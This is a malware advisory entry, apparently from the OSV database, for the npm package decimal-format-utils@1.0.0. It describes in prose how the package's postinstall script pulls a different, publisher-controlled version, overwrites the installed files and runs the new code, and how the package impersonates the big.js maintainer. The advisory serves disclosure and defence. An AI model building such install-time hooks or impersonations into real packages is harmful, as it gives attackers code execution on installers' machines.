decimal-format-utils @1.0.0
Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC
OSV ID
MAL-2026-6368
Ecosystem
npm
Summary
The postinstall script scripts/sync-peer.cjs runs npm pack decimal-format-utils@1.0.1 (or whatever version is configured via BACKUP_TARGET_VERSION/BACKUP_PAYLOAD_SPEC), extracts the resulting tarball, overwrites every file of the installed v1.0.0 package in place via fs.cpSync over the package root, and then require()s the replaced index.js and awaits from_str(). The effect is that npm install decimal-format-utils@1.0.0 executes code from a different, publisher-mutable version at install time, bypassing lockfile pinning and giving the publisher a live remote code execution channel into every install. The package additionally impersonates the big.js maintainer: package.json sets author: Michael Mclaughlin and repository.url: https://github.com/MikeMcl/big.js.git , and the README falsely claims the package is pulled in automatically as a dependency of big.js@6.2.x. big.js declares no such dependency. The impersonation appears designed to lure installers into trusting an unrelated publisher whose postinstall then executes arbitrary fetched code.
Source: amazon-inspector (864677541e3090100ca588a37d8eb525f74817ade2fce5cb3e265af45b0c4e9a)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.